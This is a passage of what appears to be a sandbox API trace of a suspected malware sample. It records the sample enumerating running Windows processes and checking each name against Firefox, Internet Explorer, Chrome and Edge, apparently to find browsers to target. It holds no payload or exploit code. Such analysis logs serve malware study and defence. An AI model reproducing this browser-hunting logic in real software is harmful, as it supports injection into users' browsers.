lpString2="chrome.exe") returned 1 [0203.454] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.455] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0203.455] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0203.455] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0203.455] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0203.455] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0203.455] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0203.455] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0203.455] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.456] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0203.456] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0203.456] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0203.456] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0203.456] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0203.457] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0203.457] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0203.457] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0203.457] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0203.457] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0203.457] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0203.457] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0203.458] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0203.458] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0203.458] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0203.458] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.458] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0203.458] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0203.458] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0203.458] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0203.458] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.458] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.459] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.459] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.459] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.459] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.459] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.459] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.459] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.459] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.460] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.460] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.460] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.460] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.460] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.461] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.461] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.461] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.461] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.461] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.461] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.461] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.461] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.462] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0203.462] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0203.462] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0203.462] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.462] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.462] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.462] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.462] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.462] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.462] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.463] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.463] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.463] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.463] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.463] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0203.463] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0203.463] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0203.463] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0203.463] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.464] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0203.464] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0203.464] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0203.464] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0203.464] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.464] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.465] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0203.465] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0203.465] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0203.465] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.465] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.465] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.465] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.465] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.465] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.465] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0203.467] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0203.467] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0203.467] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0203.467] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.467] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0203.468] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0203.468] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0203.468] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0203.468] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.468] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0203.468] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0203.468] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0203.468] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0203.468] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.468] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0203.469] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0203.469] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0203.469] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0203.469] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.469] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0203.469] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0203.469] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0203.469] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0203.469] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.469] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0203.470] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0203.470] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0203.470] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0203.470] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.470] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0203.470] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0203.470] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0203.471] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0203.471] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.471] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0203.471] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0203.471] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0203.471] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0203.471] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.471] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0203.472] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0203.472] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0203.472] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0203.472] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.472] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0203.472] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0203.472] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0203.472] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0203.472] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.472] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0203.473] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0203.473] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0203.473] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0203.473] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.473] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0203.473] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0203.474] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0203.474] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0203.474] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.474] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0203.474] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0203.474] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0203.474] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0203.474] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.474] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0203.475] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0203.475] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0203.475] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0203.475] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.475] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0203.475] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0203.475] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0203.475] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0203.475] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.475] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0203.476] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0203.476] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0203.476] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0203.476] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.476] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0203.476] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0203.476] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0203.476] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0203.476] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.476] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0203.477] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0203.477] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0203.477] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0203.477] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.477] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0203.477] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0203.478] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0203.478] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0203.478] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.478] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0203.478] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0203.478] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0203.478] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0203.478] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.478] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0203.479] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0203.479] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0203.479] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0203.479] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.479] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, 